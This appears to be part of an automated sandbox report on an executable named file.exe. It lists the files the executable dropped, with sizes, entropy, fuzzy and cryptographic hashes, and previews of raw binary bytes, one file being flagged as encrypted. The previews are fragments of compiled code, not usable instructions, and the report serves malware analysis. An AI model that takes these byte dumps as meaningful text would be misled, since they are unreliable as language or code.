                                                                                                                                                                                        Preview:%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.r.r.r.r.r.r.r.r.r.r.r.r.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.r.r.r.r.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.r.r.r.r.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                        Entropy (8bit):6.565250571851243
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:yBezXZ/doXlcuTbAryvtVaVarRS3/LMJ0eAcAAdG7pZeU:yCXBe3k+3aVkRS3/LTeAtAdyneU
                                                                                                                                                                                        MD5:A2F21D2F4986BD778F3A4C5A4A2D7DF7
                                                                                                                                                                                        SHA1:DF47F24CB09C3B2E282066A31C77A019BABB6FF3
                                                                                                                                                                                        SHA-256:C0803AC9E0A11189CBB6ED62D6444DF80AB3C399534453D7E03CD3E59F9669DA
                                                                                                                                                                                        SHA-512:35D255799762F49552C37754B386EA1D92FF8213AD6666473A1AF59E7A707E8098CE5DA1E44FF175375473120C942071479971717A5F8ED7BFAEA96D1AE9C6E9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:t...Q.P.j<V...YY..^...U..E...8P..D.I.]...U..E..H...t..u....u..u..u..u.Q.P.....@..]...U..S..M.j..S.."...Y..x4.}...C(u.VW.d.J......._^..P.u...\.I...y..C......C.........C.[]...U..E..H...t..u....u..u.Q.P.....@..]...U..E..H...t..u...Q.P.....@..]...U..VW.}...........F.Phd.J.W....W.P._^]...U..E..H...t .u(...u$.u .u..u..u..u..u.Q.P.....@..].$.U.............V..h....P.v.....I...tkW.~.Wj.......P..4.I...xHj.......P.7..0.I...x..F......%j.......P.7..,.I...x..F........F......F....J....F._....@...F.^..U..E..H...t..u....u.Q......@..]...U..V.u..F8P..@.I...u...t.Q......3.^]...U..QV..~..t_.F..M.QP...R...xN.~..u..M..q...A..q.P..A.PQ..(.I.. .~..u..M..q...A..q.P..A.PQ..$.I..F..u.P...Q0^..U..Q.E.SV3.W...]..w....sL.._.._.._.._.._....G .....G$9].td.u.....Vh.....w... .I...xI9.tE...f....E.P.6.u.VS....I...x).E..U.R.w.hd.J...P...M...Q...R...x..E..G..._^[....V..~.....sL.tF.F.W3.9x.v..F..4.....F.GY;x.r..v.....v..~...j..v..-....v..l......_.N...t...Q.P..~$.t..F.P...Q.^.Vh'.F..q..6j.Q.............QV.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):18432
                                                                                                                                                                                        Entropy (8bit):6.44990963723728
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:ZMI4kBgHb0RRyOrhZbGU3Rm08LmP/Mbs3uCYm71LA:SkBRR9rlRmLmP/puCYmBLA
                                                                                                                                                                                        MD5:E3AD485926D576272BC3834F4F711A73
                                                                                                                                                                                        SHA1:E87B64A5E13F6CF404615844235E50572FD6BB78
                                                                                                                                                                                        SHA-256:DE36B296029F55670C9D97F1864F1B20CF481E20C396E4B564344C0A4198A9CB
                                                                                                                                                                                        SHA-512:3C5C1CA29F6CD22E202FAD8AB9E4EFB6CF9BDFF399CB7FD3A29B257BDA76D72E625718E2E5A2486ECDECCFADF40326FB7DF04C4E51C726452C806442CCC3E38D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.b..R.E...c...M....~...E.PV.4c..........t..u..u...............h.tL.P.............M.P.\r...u..t.V.M..*..h..I..M..*...M..~...}..|<V.M..vD..j..u..M...l..h\tL..M..a*...E.P.M..:..h..I..M..H*..hltL..M..;*...E.P.M..h:...=d#M..t@.}..t..u.V.u..u..u.h.zL..#d......5.u.............h.zL...d.......h.....u..u..5.#M.....I... ..........t..]........M..\#M...{...M..{...M..{...M..{...M..{.._^[....U... .......VW3.3.f..............Vh....PV...u...0.I.P..RVh........I.........P..p...._^..U..E...x...x...;.}.P......M..0..C.......M...z..2.]...U....V.u...M..p...E.P............M...z..^....U.....=a#M..V..t...M......3...3.8..)M.t.9............P5M.@.P5M.9.....u.8.....u......t.....I.........3.j.QQ......Q.z.}...........)M....t8;.D)M.}).@)M........t..x..t..M.Q.p..0....I...t..-...)M...E..(M.P.....u..E.P..T.I..E.P..L.I.j.3.PPP.E.P....I.....t.....................=b#M..u...g#M....b#M....................u.3.@...=g#M..t.j.X..3.^..U..Q.}..SVW..........d......E.t..u.....u.........}..t...3M...........4
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):67584
                                                                                                                                                                                        Entropy (8bit):5.798228755646301
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:jUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mexi:Az08QuklMBNIimuzaAwusP8
                                                                                                                                                                                        MD5:402E097B13C55A275C6B549572D52FFD
                                                                                                                                                                                        SHA1:93ECE3A1B0569F3B1D3F827ABDD687B95A202801
                                                                                                                                                                                        SHA-256:A98131D193BDA98FF749D4669A081F856AEDF7A87FA3849F02BED4A3DA530BD4
                                                                                                                                                                                        SHA-512:12FB94AFAB7C09DE05A696ABAE70DCDFD4120BD9526865B0FBE0F916AF8A30B39FBA2A32F83DF077A1620D2844EC5404B9A54492CB44B523E835E0FEA49E68C9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:._.V.?(FN\.\...:7.q.?..B..:..f..m...?...<.......4..?..a.6.u....-..?.)]7...."4.L...?......<....E..?..V.#..*..!...?x.0.i.^...P..1.?.y_....-.a`.N.?...z.H<W...Aj.?v.d.K..<.<.....?.b....s<....*..?V...b.<'*6...?.B.C}<.......?3xj...<.,.v...?.WY.....Bf....?.i.v...O.V+4.?.<...z....].Q.?....h...'.6Go.?....,..<......?...[.<)TH....?.GF.L2.<.FY.&..?..i..K<<H!..o..?].0...<..v....?G.V.B..U:.~$.?..@~.... ..4FC.?2..u<H..%"U.8b.?3.Y.....s.L.U..?d>.D.8`<.;.f...?Ud..4.....u...?...gV.r./.e<...?..<h:.k...Q.}..?...%.<..t_..u..?.z..Gn..t..H.?.?;.el....gBV._.?.m1WY$..?].Oi..?,....f.<...s...?/...w...2.0....?.M..L..<bN.6...?~y...]p<..>T'..?*.mb.|....L..%.?.2...L....#F.G.?..A.....D..h.?.......f....?:.|...<.*B..?&K.V..<.D..2..?...2^.p.6w.....?l....<....[..?#%X.y.....77.?.~..._g..R..DZ.?9.|Kv.PN..}.?..|[......p..?2...s.......?..q.F||<##..c..?nL.x.$x<e.]{f..?2..]IY..3-J.0.?.6.}\0.<]%>..U.?.A..n/..X.0..y.?.c..~.<..yUk..?1......<z..k..?.l..4.....Z....?..]4..<f..)...?
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):55296
                                                                                                                                                                                        Entropy (8bit):6.667223003791237
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:uoHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrS:vHSBRtNPnj0nEu
                                                                                                                                                                                        MD5:209FA27E972D3C51EC64CE3ECB581BC7
                                                                                                                                                                                        SHA1:A340D641D3253008F0910A8E89318FC93F4FDF84
                                                                                                                                                                                        SHA-256:5407B3EBB6000281EE905FD3BDD6B96436B8FB232C06E1D5B46C9878F638CDD8
                                                                                                                                                                                        SHA-512:6BEFA418099987E49789DE42E42AD8D3141BE94B5F81F1E5CCD4AF2DB837B12FBF575A855B41BB01B8FD88B62F51546A3B14F9F0558B94D7FC2A677F91DB3D5B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:E.9J0~>.M..P.S.....Y..u..E.3.f9LX.u..U(...U(G.M..B4..A...M.;z0|.3.u.;z0...........u.G..M.].;BL~..BL;z0}:.].M..B4S..A.M..Q..M..q...Y..u..M.f9DY.u..U(FG;z0|.].M.U.;u.~..].Cf.r.f.B.........].f.B......}.....'...E.jRZf9.ue.U...~=j0_...Pf;....&..f;.L......&...........&..k.......E.B;.|..u.......U......f.J..M(f.B..u..h.........&..S.$.L....F5..Y.....&...U.......].f.B..u....U..s.3..u.......E.}..M(.^1..j+Y;.t%j-Y;.t.....U../...+..j9Y.U.;....+..j)X.E...J....E.E.A|........A\j}_...........M(.A\....}.u.....3....j)...u.Xf9....%..........V...j=.u.Y...f;.t.j>Yf;.t.j<Yf;....$.........j)Yj>.M..3.Yf;....U.......U.3.E..jv..T...Xf...u.j.X....x.....u.j0_....U.f;.r=....j9Xf;.w.k...w......u.......;...5$.........f;.p...s.U.j)Xf9...$$..f...M(j.X..].E.+A...@f..3.f.B.j.X...]2..............F.j!..Z;.......j=Zf;............f;....#...E(..j.[..@.......#...r....j0.u....Y.].u.f;.r.j9Yf;...R$.........f;.w7.M(..j.[.y.......U...8t..r..u........u.f;.h...v.].M.+M....},..M...5....U(j<_j>.B
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):43008
                                                                                                                                                                                        Entropy (8bit):4.951310419857991
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:IKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:IKaj6iTcPAsAhxjgarB
                                                                                                                                                                                        MD5:F57DC13D2A4869467E378CBDE8AD95CD
                                                                                                                                                                                        SHA1:2116BE8115B8DDD0F9DD7021DCCD76B518F22FE2
                                                                                                                                                                                        SHA-256:B7E3F2E9F08FCF3B5EA94F9FEFE73275567A0F5C11263901546C6667A429CC5C
                                                                                                                                                                                        SHA-512:B2B2D409232C87F525FA9B06060F18DB48D634AEF93B22B805C940081CCDD5CD1898A1EF34099234047FEC55AC6145180756FCF2C9B4A70E6067CB99B376050B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{.{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{.............................................................................................................................................................................................(.......(...........(.......(.......(...!...A.L.T...B.A.C.K.S.P.A.C.E...B.S.....D.E.L...D.E.L.E.T.E.....D.O.W.N.....E.N.D...E.N.T.E.R...E.S.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                        Entropy (8bit):6.622916860548392
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:qRBcSyRXzW8/uC9gHOGCP/wJv5iKpnTBw9RXVF2GUrtAW93Uq1oD3OQOcqkLPlHm:YcSyRXzW8/uC6LdTmHwANUQlHS3cctlN
                                                                                                                                                                                        MD5:10F390540E2F28AF21BE71BEE91F887A
                                                                                                                                                                                        SHA1:DDF48677896D773768FCFE5A1C2E326722811C01
                                                                                                                                                                                        SHA-256:B1CE10172DFC8C66021EC8E94A5774681D73E9FBED7CF52D21EC8B1755D0617B
                                                                                                                                                                                        SHA-512:91C4A011EF0DCB6329A79CF0472ABF5FC1DF30FC75B803BDE5C3FA892C5FA893517A82C44856825B75DFD5CA0F02B8F06B3B825A89FD2FC5364A60435910F4EF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.M.%....=....u.............%...............M.E....@.K....@.K.9U.r..@.;.t;..;.s.}........E....E.@P.u...V.u..u..*..........Y........}..........E...@..P.u.V.u..u..................E.9E.......;~|.............}....t+..%....=....u...............................$t&..@t!..`t.......r.......v.......s.3........;E........E....E.@P.u...V.u..u..I..........S.................E.9E......;~|..9..........}....E..t*%....=....u.............%............................L.........E.,K.......K..F|.M.;........U..}......E.....t/..%....=....u!..G.......%..........E............u...............L.........E.,K.......K............1L..u.t..E.M.<C.F|...;...m......F|.].......t ;.r.;.....v..Fh.............{....E....E.@P.u...V.u..u....................V....+.;...;...f..f;F4...........<...f.G.f;F6....................%....................E.......u..............u.....$...E..u..E...w4t..........A..........2;~|.....f.?.......x...........t.................~l................w<..r.........w...d......
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):41984
                                                                                                                                                                                        Entropy (8bit):6.6824851170406045
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:wULYvwTiKwt3U2ukChn0kHR+h+Op6QD36wJ72KmIsbrl2tUGxBWmUJNmoKzV:woJiKwtk2ukC5HRu+OoQjz7nts/M26N9
                                                                                                                                                                                        MD5:5251998BA3FB49ACDE1015413ED43384
                                                                                                                                                                                        SHA1:54AA5290A0F0832AEC2DF834E94672EEDF1CFB29
                                                                                                                                                                                        SHA-256:FF68F50AB8FEE781F91A3FE0D175A97E2126B03AEF3EC21139224330FBF3D330
                                                                                                                                                                                        SHA-512:25C0AE18D6EA7B8E14B367391F0B7B53A8BD02F182A87E6FDE642CE68AFCC4E51DCA99C9A3CFD803ED8E2B5334F157E8D66502566F04EE7E1BFD690F882DBFAA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:H..V..N.....F.^]...U...,SVW...M.}..."...u..M..w..^..]..(....E...y:h....j.SP.u....6.<.......y...3....V3.M.SW......E...E...3..E...j.V.u.u...j..u..0......v..M.E.+.PW.}.W.....E.P.M.....9u.t9.u..M..u....u.C.u.E...t.;.u..G..M.+.PVW.^....E.P.M..G.....t..E..P.\!...M... ...M... .._^..[....U....SVW.M...!...u..}....E..X...;_.......3..E.8E.t.S.....f.8{u..C..E......3..E..M..g....5P...y......P.x...Y..t&..Q.E...A.....X....M....P.......;G.|..u.......}....Yt..}..t!..;G.t.P.......f.8}u......E.......M..*..._^..[....U..V....D.I..&....v...b...E..Yt.j.V.b..YY..^]...V....u..j.V.b..YY..^...U..W......tV.G.V.0......u..p.....3.j.Z............Q.b...O....1V.....u.V.....G..0.kb...G... .0^_]...U..V.u.Wj.h..I.V...=........u....3.@_^]...j.h..I.V..........u..G....j.h..I.V..........u.S.N,.b.....V...V...V.7...Yj"[..LF.f;.t j'Zf;.t....f;.t.f;.t..O.V...P...f9.t.3...3.f.LF..F..O.P...R.3.GV.a..Y..[.S...U..S.].VW.}...j.Z.49.A...3.u..F..........Q.Sa.........VQW.Xq...33..M....f..>..~.f1.G@;.|..._^[
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):35840
                                                                                                                                                                                        Entropy (8bit):6.586089463725046
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:NGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSHuc:QXnP94SGGLpRB6M1
                                                                                                                                                                                        MD5:A05193BF1E68B3FA200D71C3E81B5B42
                                                                                                                                                                                        SHA1:6A7F84ED1E3BEA9C7F300F8F4496CB16178FCCB8
                                                                                                                                                                                        SHA-256:71EAD8AA39BA5AB49FED0DD3145F89F5F75EAF0929100948A6B280F22DFB6942
                                                                                                                                                                                        SHA-512:6AD9D9C9408C45A077238754D379B1588A38E0F6E87E6CBFCB7E7BA15507A3C59FC0C54FDC60A5FB413362735E0EF82FBCB844E246A2F5FA02BF4D095DDCE48E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.u..u.P.E.P.u.W..................A.j.Yf9H........E.HO..\.....E...b.....e.....E...Z.......\....>.....`....E..E.....V...;........I...3..3....u.3..u..u..u.RQ.u.S.a.....x...M.......M........t..........h.........M.......\........M....._..^[...............2....M..U................A.j.Yf9H........}.............A.j.Yf9H........E.E.}.M.PG.|....E..E......E..E.}.h...PG.[.....l....E......M..U.9E.............................E.HO.}...E........}...E..........M.......E..E.E..x.;...9...Vh..........A.j.Yf9H........M.IO..h.....M.tF..q.....E.u?....h....q.....l....M..E..x.;.......Vjx.....]..@..o....]...@..J@.GJD..M@..M@..L@..M@.fN@..M@..N@.uK@..K@..A...u..V.j...SVW..3.8_...o...8_.u..G.j.P.p......YY.w.._..._^[....U..V..~....U...j.....Y.M......N..H..F...^]...U..E.....;....}....\....}..u4.}....k....}....j....}....i....} .u..}$...1...3.]. .j.jw.&...j.js.....U...lSV3.M.W.]..o...u..M..E...I..]..]..]..].......M...$M..E......6m..V..#M..n...E.P.M...9..h..I..M...b..Sj..E.P.E.P..m...M.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):31744
                                                                                                                                                                                        Entropy (8bit):6.494112094592876
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:hbUb5t7i4KePMiJsS+dbzWoMFfTu8kbowGI9KgvoA3tnTnb+6h+HMU64k:ObLmbZzW9FfTubb1/Dde6YF64k
                                                                                                                                                                                        MD5:2F178344B946AC6B7EEC96CA3702FDFF
                                                                                                                                                                                        SHA1:F033AC7AF2EA73F217F881E1884311A58D027FE4
                                                                                                                                                                                        SHA-256:55083B8BC8F1776E7202225EA8896B0377B669A9C853D09AA294853705E08D60
                                                                                                                                                                                        SHA-512:8F72CE152CFA5386E20264A9F68C1442044E20C38498547D5DFEFC731807FD27240FBE214CCD4D0E7AD492C6F5721EC5D1142177AA2ECA1105761103637F5830
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:D9.t..@8.@...L$.......L$(......L$8....._^3.[..]...U..V.u....i.....u..u.........&..F.............j...:..3.^]...U..V.u....-.....u..u........&..F.............j..:..3.^]...U..V.u..........t.........$....u..u....[....&..F.....3.^]...U......@...SV..M.h..I..b...u.....+..j....K+......?...I...Y..A...y...t..@8..P.....t..@8.@......y...A.t..@8.@...G.L$..1(...L$.....D$.P.......L$..0.....M..D$.P..q...L$.....L$...%..^3.[..]...U..V.u..........u;...H..|1...D1.t..@8.@......|1...D1.t..@8.u....@...<....&..........u...W.8.$....>_.F.....3.^]...U......$SVW.u....v.....u..u........3.C............D$.3.CSP..9..:........M..5s..j...SV.y...L$..D$,.d$4.j.SPV.L$<.\$H.Y.......L$ .....D$.3.S.D$$.D$$SPV.|$8.\$<.........L$ .b....D$.+D$.j..D$$.D$$SPV.|$8.\$<.........L$ .4....D$.+D$.j..D$$.D$$SPV.|$8.\$<..~......L$ ......8.u.........&..^....H..|9...D9.t..@8.X..|9...D9.t..@8.@.._^3.[..]...U.......V..M.h..I...`...u..........u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...a.L$..6..........D$.P..8....u....H..|
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):69004
                                                                                                                                                                                        Entropy (8bit):7.997776262524317
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:etPRR1weNQJNPlnnKHw7TC+5f3eTjmoV4ch2RBV49z8F3Y:4P3m1UHgP1Nchkg9z8F3Y
                                                                                                                                                                                        MD5:A2F118A6F00B962B7C579A261C7804C9
                                                                                                                                                                                        SHA1:665111A5CE8FE215E18A92C247C84E887C2D4D61
                                                                                                                                                                                        SHA-256:8630177ED24B4143FD5D72584E01FE51CB3B407D899638F3FE95D734F389A789
                                                                                                                                                                                        SHA-512:3AAE946543229B59CDD9C792B48E06EF00AF10EE455FA17F1E0571E1321C8F86FC2C80DF35D276BC050954BC70AED11A3FE845B4A767DC96A6F303A23F90DCEE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.b^..M..|..3$J].k..m.O.p?.V}.....%_..e.4.......-9..7*6...F..'.......R.O]DF....F......:........'L|.;.#.....J.......`...f..vm.M..|;..gz'IyH..I.h..&..N.....5....\LHt....Ax.o..4.].,....OFy....76.3\.........].....hN..P.=.{....../.$..A.v..1o.v..]Q..0...T.+L.....-.*..B C...D..hG.Ms.y...,K'......o.~.7.M....e;(G8.Fd..Q.B.R~..G.......`H.`.k.....i....6'..j+..k.[.1Z.G............my.T.r.`..E`8.M..........|.L.....B.....g..2..%....x.(...).p....L:R....o....!.`o....e.e|.`d..j=!_.K.-k.....i.JiRS.../[?....u.7.;..w.Y.w^. ..BvK+<....U3..]x...4....S.}.L.Q...^0.i.uH...Z...q.......M. 61.y...jC......s.p...j.!.........V;.;.j...j...v.["..?.j.1.X.#.o.z..sSw.......7...Y...[qH..r.:.t..s.F[.e..4....0mp%...Z....D(..!.]..bb<....cF..o,.{:. o..........|m.j.....9C..S...U..-,.........)..mz!.....v....O.zQ...<...B....w^.x.`.x4._a....*..o.@..3+.. ?..Q.J.....n.C..=|..._..0Y..=?..)Cj?....<..G.>do.FRx...P.d.W.EA........hs....NS.x....n.g.9aOL.|o.}k..@..F...%.E/.:Q(F.K_
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):6.7049790695127465
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:NdoXSMf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04Vr:Eh+I+FrbCyI7P4Cxi/
                                                                                                                                                                                        MD5:0610AF0059338136BF8C338F9DF9F4E9
                                                                                                                                                                                        SHA1:AE56E66B0643DD15D02C6E49E419D0720A71A2CF
                                                                                                                                                                                        SHA-256:8B39EAC835DB993685CCC47FA51581D0481FEB82181A024E8DC82D0C6998D5A2
                                                                                                                                                                                        SHA-512:FEE68EF1F022CB0B791B644DB311EDAF94667AD7460455BAD304838947E79D7262099FC7288709D9BFC5ED9D59AC1EDE415FE4053ABCF72AD78462D0831327F3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.94...M.u1..........M...u.j.^.u..E............!M...@..!M.G.u.j..a...Y..U..E....?...k.0.....M.P..h.I.]..U..QSV.u...xi;5.!M.sa....?...k.0.....M..M..|...uCW.....}....u"...t....t....u.Wj...Wj...Wj.....I......M..M..|..3._................. ....^[..]..U..E....?...k.0.....M.P..\.I.].j.h(.L......j..*...Y....}.3.]..]......}M.....M..E..uS.........M...t/...!M.@.....W.....Y........?k.0.....M..D.(..}..E......................M...j0X.u.;.t`.F(.u.V..h.I..F(.t.V..\.I..M.j0X....+u..j0Y......4.........?k.0.....M..D.(......M..|.....t...C......}.j..u...Y..U..SV.u.W..xg;5.!M.s_.....?...k.0.....M..D.(.tD.|...t=........u#3.+.t....t....u.Pj...Pj...Pj.....I......M..L...3....(............... ...._^[]..U..M....u...... .............C..x';..!M.s.....?...k.0.....M..D.(.t..D..]..... ..................]..U...8...L.3.E..E....?...Sk.0V.....M.W.}..}.M.D...E.E...E.....I..u..M.E.3....F..F.;...=..../3.f.E.E.m.....M..L.-...t..D......E.E.j..m..L.-P.:.............f..Ht$;}.......j
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):68608
                                                                                                                                                                                        Entropy (8bit):5.857481787411282
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:lL6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbF9:lewy4Za9coRC2jfTq8QLeAg0F9
                                                                                                                                                                                        MD5:56E8E3FD9ABF7E1E0275B2E838A5EF57
                                                                                                                                                                                        SHA1:ABDC8B68B01D5910485A550BBEDA6DC6EC65C20A
                                                                                                                                                                                        SHA-256:42AFF549FF3F6BE7336B9AE9A616FCC927E2CF75DC09D4A9A2E51F33968DFF18
                                                                                                                                                                                        SHA-512:6E261AB2509A146D3E4790149C62A970F7EDAFC04AAC1AF227FD887C506E02351FBCBCCE47C7B41FF51622D5267255B223C34D1F52CF52C55B63003EDABB2D6E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:W..\.I..M.j.W....\.I..M._..3.@]...U..)M....VW.}..E...t7..99t..@...M..y..u..E...)M.P......P.....;.tGQ....9...=.u..~..u.3..3.M..~:...E.}.;.t.V....9...E.)M.P.;....M..{8..3.@_^....U..}..t..u...(M..c......L)M.....L)M....tY.@)M.V....0.F...t.9..)M.u....)M...F.P..<.I..f...}..t#.u..u...@.I..F...4.I.9.u..L)M...)M.^]...U..}..t..u...(M........L)M.....L)M....u.3..-.@)M.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...(M..{......L)M.....L)M....t$.@)M.j.j.j ......E..1.A..E..A.....I.]...U..}..t..u...(M..(......L)M.....L)M....u.3..h.@)M..E.....L.V.....0....D{....L..8....F|....E....t........E....t........Nl;M.t..u...7...E.......3.@^]...U..Q.}..t..u...(M.......L)M.....L)M.VW..........@)M.j.....0..P.E...\.I..}......#.+.....@.E....t.Wj..u...@.I...tb.}..t..u.j..u...@.I...tJ.~8.t?.....3.#.;....9E.t.j.;.u...L.I..FH....L.I.)FHjG3.PPPPP.u.....I.3.@..3._^....U..Q..L)M.V...t..@)M.......0..3..u...(M.....E....tZ.}...L)M.tK.E.P.E.P.u...9....t;.M..@)M.....M....T)M.............u........
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):62464
                                                                                                                                                                                        Entropy (8bit):6.975790841576853
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:YWyu0uZo2+9BGmdATGODv7xvTphAiPCh1:YWy4ZNoGmROL7F1G7h1
                                                                                                                                                                                        MD5:1DB6805B4802F7E943EB19217E2E58D4
                                                                                                                                                                                        SHA1:0354FD0DC9ED3963713E6BA0F1DB2249F36A2425
                                                                                                                                                                                        SHA-256:CEB583ACEFB2443A5BAB27F21F6F15668FC853AA85F148787DDC8DAB28F36CAC
                                                                                                                                                                                        SHA-512:7A6CA112ADC68347BF3AADC469650491476FE245642DE16CADC031CF49622D79965FB37E2D8E4B54DD723AE08A95F28DA74C35B6C10CDC4BBA1276AF0C13D64C
                                                                                                                                                                                        Malicious:false
